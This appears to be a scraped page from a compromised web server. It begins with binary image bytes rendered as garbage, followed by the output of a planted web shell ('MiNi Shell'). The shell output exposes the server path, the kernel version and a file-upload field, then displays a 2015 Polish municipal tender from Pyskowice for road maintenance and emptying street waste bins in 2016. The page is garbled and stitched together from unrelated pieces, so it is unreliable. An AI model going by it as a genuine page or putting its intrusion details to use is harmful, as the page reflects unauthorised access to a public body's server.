JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151123/170953-N-2015.html

<p class="kh_header"><b>Pyskowice: Całoroczne utrzymanie dróg gminnych oraz opróżnianie ulicznych koszy na odpady na terenie Gminy Pyskowice w roku 2016</b><br>
<b>Numer ogłoszenia: 170953 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całoroczne utrzymanie dróg gminnych oraz opróżnianie ulicznych koszy na odpady na terenie Gminy Pyskowice w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Całoroczne utrzymanie dróg gminnych oraz opróżnianie ulicznych koszy na odpady na terenie Gminy Pyskowice w roku 2016
Zakres zamówienia obejmuje:
I.Zimowe utrzymanie dróg gminnych 
Zamówienia obejmuje:
1.odśnieżanie  i  przeciwdziałanie  śliskości  na  drogach,
2.wywóz  nadmiaru  śniegu.
Odśnieżanie i przeciwdziałanie  śliskości należy rozpocząć bez wezwania ze strony Zamawiającego z chwilą wystąpienia opadów śniegu lub zjawisk, które mogą powodować gołoledź czy inne utrudnienia w ruchu kołowym. Prace powinny  być wykonane tak, aby zachować stałą przejezdność dróg. Po każdym dniu, w którym  przeprowadzona była akcja zimowa, Zamawiający otrzyma potwierdzenie jej prowadzenia wraz z dokładnym zestawieniem wykazu dróg z podziałem na kategorie  oraz ilością kilometrów objętych zimowym utrzymaniem w danym dniu. Potwierdzenie  prowadzenia akcji Wykonawca zgłosi w formie pisemnej, faxem lub e-mailem osobie  pełniącej nadzór ze strony Zamawiającego najpóźniej do godz. 15.00 następnego dnia  po dniu, w którym akcję rozpoczęto (od poniedziałku do czwartku), natomiast za  prowadzenie akcji w piątki, soboty i niedziele, do godz. 15.00 w poniedziałek.  
Zamawiający naliczy kary umowne za prace, które nie zostały zgłoszone zgodnie z  w/w wymogami. Pojazdy służące do prowadzenia akcji zimowej wyposażone są w urządzenia GPS. Wykonawca każdorazowo na żądanie Zamawiającego niezwłocznie udostępnia zarejestrowane dane dot. lokalizacji pojazdów we wskazanej dacie.
Wykonawca zadania we własnym zakresie przygotowuje, gromadzi oraz przechowuje materiały do usuwania śliskości. Wykonawca jest zobowiązany stosować odpowiednie dawki materiałów w zależności od typu spodziewanej śliskości, rodzaju występującej śliskości, warunków atmosferycznych oraz temperatury nawierzchni zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach (Dz.U.Nr 230, poz.1960 z 2005 r.) 
Łączną  powierzchnię  dróg objętych odśnieżaniem i przeciwdziałaniem śliskości określa załącznik nr 3 do SIWZ. Zgodnie z przedmiotowym załącznikiem wyszczególnione  drogi i place gminne w granicach administracyjnych Gminy Pyskowice podzielone są na  I, II i III standard zimowego utrzymania dróg określony w Zarządzeniu nr 46 Ministra  Transportu i Gospodarki Morskiej z dnia 25 października 1994 r. Prace związane z wywozem nadmiaru śniegu każdorazowo wykonywane będą na odrębne pisemne lub mailowe zlecenie Zamawiającego. Termin wykonania wynosi 2 dni od otrzymania zlecenia. Do obowiązków Wykonawcy należy stały monitoring stanu nawierzchni dróg i placów  gminnych. UWAGA 1. Wykonawca  zobowiązany jest do dostosowania pracy ludzi i sprzętu do zmieniających  się  warunków  atmosferycznych. 2. Niedopuszczalne jest stosowanie żużla wielkopiecowego oraz paleniskowego jako materiału szorstkiego do prowadzenia akcji. 3. Zadanie zimowego utrzymania dróg będzie realizowane nie dłużej niż do dnia 30.04.2016 r.
II. Letnie utrzymanie dróg
Zamówienie obejmuje: 
1. Ręczne zamiatanie ulic na szerokości 1 m wzdłuż krawędzi jezdni po obu stronach w  zakresie zgodnym z tabelą 1 w załączniku nr 4. 
2. Ręczne oczyszczanie ulic gminnych (tzw. skrobanie) na telefoniczne lub mailowe zgłoszenie w zakresie wskazanym przez Zamawiającego. Prace będą polegały na:
oczyszczaniu ulic z trawy i chwastów wyrastających wzdłuż krawężników,
usunięciu łach piachu i innych nieczystości z ulic lub w wyniku  opadów,  
usuwaniu zanieczyszczeń powstałych w wyniku nieprzewidzianych zdarzeń losowych,  wymagających jak najszybszego uprzątnięcia z ulic miasta. Prace te wykonywane  będą na bieżąco lub w trybie interwencyjnym na zgłoszenie Zamawiającego, w ciągu  maksymalnie 3 godzin od chwili zgłoszenia (dotyczy także dni wolnych od  pracy).
3. Mechaniczne  zamiatanie  ulic w zakresie zgodnym  z  tabelą 2  w załączniku  nr  4. Przewiduje się  trzykrotne czyszczenie ulic w okresie trwania umowy w terminach  wskazanych  przez  Zamawiającego  wg  istniejących  potrzeb.
4.Interwencyjne oczyszczanie ulic polegające na sprzątaniu  ulic w  obrębie  których, organizowane  będą  w ciągu  roku  przez  Gminę  imprezy  kulturalne  (przed  i  po imprezach), jak również wszystkich ulic wykazanych w załączniku nr 4,  w  terminach  i  zakresach  wcześniej  ustalonych  z  Zamawiającym.
5.Ponadto  Wykonawca  zobowiązuje  się  do  pełnienia dyżurów  w  okresach  świąt  oraz  w  dniach  ustawowo  wolnych  od  pracy,  w  terminach  wcześniej  ustalonych  z  Zamawiającym.   
W  trakcie  dyżurów  interwencyjnych  Wykonawca  bez  wezwania  Zamawiającego  dwa  razy  dokonuje  objazdu  ustalonych  wcześniej  miejsc,  ponadto  na  każde  telefoniczne  wezwanie  Zamawiającego.  Wymagany  czas  reakcji  na  telefoniczne  zgłoszenie  1  godzina  (od  chwili  zgłoszenia).
6.Gromadzenie  i  wywóz  nieczystości  powstałych  podczas  oczyszczania  i  zamiatania  na  wysypisko przeznaczone  do  składowania  tego  typu  odpadów, potwierdzone kartą przekazania odpadów załączoną do wystawianych faktur.
7.Dodatkowo Wykonawca Zobowiązany będzie do wykonania prac na telefoniczne zgłoszenie Zamawiającego poza ustalonym harmonogramem maksymalnie w ciągu 3 godzin od chwili zgłoszenia.
III. Opróżnianie ulicznych koszy na odpady 
Zamówienie obejmuje: 
Opróżnianie  koszy  ulicznych  z  odpadów  o  kodzie  20 03 01  (niesegregowane,  zmieszane  odpady  komunalne),  posadowionych  zgodnie  z  załącznikiem  nr 5 i 6  do  SIWZ.  Przy  opróżnianiu  koszy  żółto - czerwonych  oraz  koszy  na  psie  odchody  należy  stosować  wymienne  worki  o odpowiedniej  pojemności, o której mowa w  załączniku nr 5 i 6 do SIWZ. 
Kosze  będą  opróżniane  zgodnie  z  załącznikiem  nr  5 i 6  do  SIWZ. Harmonogram w zakresie podstawowym określa załącznik nr 5 obowiązujący w następujących miesiącach: styczeń, luty, marzec, listopad, grudzień. Harmonogram w zakresie rozszerzonym określa załącznik nr 6 do SIWZ obowiązujący w następujących miesiącach: kwiecień, maj, czerwiec, lipiec, sierpień, wrzesień, październik.
Kosze  przy  lokalizacji  z  symbolem  *  opróżniane  będą  w  pierwszej  kolejności  tj.  do  godz.  8.00,  zaś  pozostałe  do  godz. 10.00.
Wykonawca  zobowiązany  jest  do  wykonywania  prac  zgodnie  z  ustalonym  harmonogramem  (załącznik  nr  5 i 6 do SIWZ), w ilości 31.658 opróżnień. Ilość ta może ulec zmniejszeniu nie więcej niż 5% z powodu konieczności likwidacji kosza w danej lokalizacji np. na skutek kradzieży lub dewastacji.
Zamawiający zastrzega sobie prawo dodatkowych opróżnień na  telefoniczne  zgłoszenie  Zamawiającego  poza  ustalonym  harmonogramem w ilości maksymalnej 1.400 opróżnień w ramach dodatkowych wywozów.
Zamawiający  zastrzega  sobie  prawo  do  wezwania  Wykonawcy  do  opróżniania  koszy  także w  dni  ustawowo  wolne  od  pracy,  w  tym w niedziele  i  święta.  Wymagany  czas  reakcji  3  godziny  na  zgłoszenie  dokonane  w godz.  od  8.00 - 16.00.
Zamawiający zastrzega sobie prawo  ustawienia  w  czasie  trwania  umowy,  dodatkowych  koszy  w  nowych  lokalizacjach  (przewidywana  ilość  około  30  sztuk). Postawienie koszy nie będzie należało do obowiązków Wykonawcy, a jedynie ich opróżnianie w częstotliwości wskazanej przez Zamawiającego (szacowana ilość opróżnień  została uwzględniona w opróżnieniach dodatkowych).
Poprzez  opróżnianie  kosza  należy  rozumieć:  usunięcie  odpadów  z  wnętrza  kosza  oraz  z  terenu  znajdującego  się  wokół  kosza  tj.  w  promieniu  2  metrów  od  kosza.  W  sytuacji  gdy  kosz  zostanie  przekrzywiony  do  obowiązków  Wykonawcy  należy  ustawienie  go  w  prawidłowej  pozycji. Wykonawca zobowiązany jest do mycia wszystkich koszy wewnątrz i na zewnątrz pojemnika co najmniej raz w roku tj. od 23 do 31 marca 2016 roku oraz  dodatkowo dwukrotnie w terminach wskazanych przez Zamawiającego. 
Wykonawca  ma  obowiązek  powiadomić  Zamawiającego  o  kradzieży  lub  zdewastowanym  koszu.  Fakt  ten  powinien  być  zgłoszony,  w  tym  samym  dniu,  w  którym  zgodnie  z  harmonogramem  realizowano  zadanie. Uwaga:
Zamawiający  przeprowadzał  będzie  wyrywkowe  kontrole  realizacji  usługi.
W  razie  stwierdzenia,  że  usługa  nie  została  wykonana  należycie  tj.  występują  wady  w  wykonaniu  przedmiotu  umowy  (kosz  nie  został  opróżniony w wymaganym terminie,  wokół  kosza  w  promieniu  2  metrów  zalegają  odpady),  Zamawiający  poinformuje  pisemnie  Wykonawcę  o  występujących  nieprawidłowościach,  na  potwierdzenie  czego  zostanie  sporządzona  notatka  służbowa  oraz  dokumentacja  zdjęciowa.  Wykonawca  zostanie  każdorazowo  obciążony  karą  o  której  mowa  w  umowie  stanowiącej  załącznik  nr 8 do  niniejszej  specyfikacji. Uwaga Wytwórcą odpadów jest Zamawiający, natomiast Wykonawca realizacji usługi opróżniania ulicznych koszy jest odbierającym odpady komunalne. W związku z powyższym Wykonawca od momentu odbioru odpadów ponosi za nie wszelką odpowiedzialność oraz  ponosi opłaty na rzecz ochrony środowiska zgodnie z ustawą o odpadach i innych obowiązujących przepisów.
Wykonawca zapewnia miejsca składowania odpadów komunalnych nie segregowanych, zebranych w trakcie realizacji zamówienia dla Regionu II, w skład którego wchodzi Gmina Pyskowice - zgodnie z Planem gospodarki odpadami dla województwa śląskiego 2014.
Wykonawca zobowiązany jest do przekazania zmieszanych odpadów komunalnych oraz odpadów zielonych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych właściwej dla Regionu II, w skład którego wchodzi Gmina Pyskowice - zgodnie z Planem gospodarki odpadami dla województwa śląskiego 2014.
Cena ofertowa poszczególnych zadań powinna uwzględniać wszystkie obowiązki nałożone na Wykonawcę wymienione powyżej. Cena jednostkowa netto oraz cena całkowita brutto umowy podana w z załączniku 1 do SIWZ będzie maksymalnym wynagrodzeniem Wykonawcy jakie może uzyskać przy realizacji zamówienia. Cena ta ustalona jest na cały okres obowiązywania umowy i nie podlega zmianie. Wykonawca musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na przedmiot zamówienia. Wynagrodzenie będzie wypłacane za prace wynikające z harmonogramu zgodnie z załącznikami 3,4,5 i 6 do SIWZ oraz za faktycznie wykonane dodatkowe prace zlecone przez Zamawiającego, zgodne z treścią umowy.
Ze względu na nieprzewidywalność warunków atmosferycznych i charakter zamówienia wymagający bieżących reakcji, wielkości podane w formularzu cenowym w kolumnie nr 4 są wielkościami szacunkowymi i mogą ulec zmianie bez możliwości przekroczenia kwoty wynagrodzenia podanej w formularzu cenowym w wierszu nr 15.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 ustawy Pzp. w  okresie 3 lat od udzielenia zamówienia, stanowiących nie więcej niż 10% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.62.00.00-9, 90.63.00.00-2, 90.51.32.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą posiadać :
- uprawnienia do wykonywania działalności polegającej na odbieraniu odpadów komunalnych zgodnie z przepisami  ustawy o utrzymaniu czystości  i porządku w gminach  z dnia 13 września 1996 r.  (Dz. U. 2013 r. poz. 1399)
- uprawnienia do transportu odpadów komunalnych nie segregowanych (zmieszanych - kod 20 03 01) zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz. U. 2013 r. poz. 21). Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w pkt. VII SIWZ punkt 2.1 i  2.2 oraz pkt III.4.1 kropka 1 niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  ubiegający się o zamówienie muszą wykazać wykonanie w ciągu ostatnich trzech lat przynajmniej 1 usługi obejmującej swym zakresem letnie i zimowe utrzymanie dróg oraz opróżnianie koszy ulicznych, a w przypadku świadczeń okresowych lub ciągłych wykonywanie jednej usługi w zakresie niezbędnym do wykazania spełnienia warunków wiedzy i doświadczenia o wartości nie mniejszej niż 150.000,00 zł brutto. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w pkt. VII SIWZ punkt 2.1. i 2.3 oraz pkt III.4.1 kropka 2 i 3 niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą posiadać odpowiedni sprzęt do wykonywania przedmiotu umowy, którego zestawienie należy wykazać w zał. nr 7 do SIWZ. Przy czym sprzęt przeznaczony do akcji zima musi być wyposażony w urządzenia GPS i nie może być w ilości mniejszej niż: piaskarka - 2 szt.
pług śnieżny - 2 szt. samochód samowyładowczy 5 t. lub ciągnik z przyczepą	- 1 szt.
Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w pkt. VII SIWZ punkt 2.1. i 2.4 oraz pkt. III.4.1 kropka 4 niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w pkt. VII SIWZ punkt 2.1. i pkt.III.4.1 niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp wymienionego w pkt. VII SIWZ punkt 2.1. i pkt. III. 4.1 niniejszego ogłoszenia, w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający rozumie usługi polegające na letnim i zimowym utrzymaniu dróg i opróżnianiu koszy ulicznych na odpady w zakresie i ilości niezbędnej do wykazania spełnienia warunku wiedzy i doświadczenia opisanych w rozdziale VI pkt 4.tj. jedna usługa o wartości nie mniejszej niż 150.000,00 zł.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany wykazać Zamawiającemu, iż będzie dysponował tymi zasobami do realizacji zamówienia, w szczególności przedkładając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich podczas wykonywania zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność notarialnie. Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
 - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem,
 - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia i dokumenty, które należy przedłożyć wraz z ofertą. 
1. Oświadczenia, że Wykonawcy:
1.1. zapoznali się z treścią SIWZ oraz wszystkimi załącznikami stanowiącymi jej integralną cześć i nie wnoszą do nich zastrzeżeń,
1.2 w przypadku przyznania im zamówienia, zobowiązują się do zawarcia umowy w miejscu i terminie wskazanym przez zamawiającego na warunkach określonych we wzorze umowy stanowiącym załącznik nr 8 do SIWZ
1.3 uważają się za związanych niniejsza ofertą na czas wskazany w SIWZ tj. 30 dni od upływu terminu na składanie ofert,
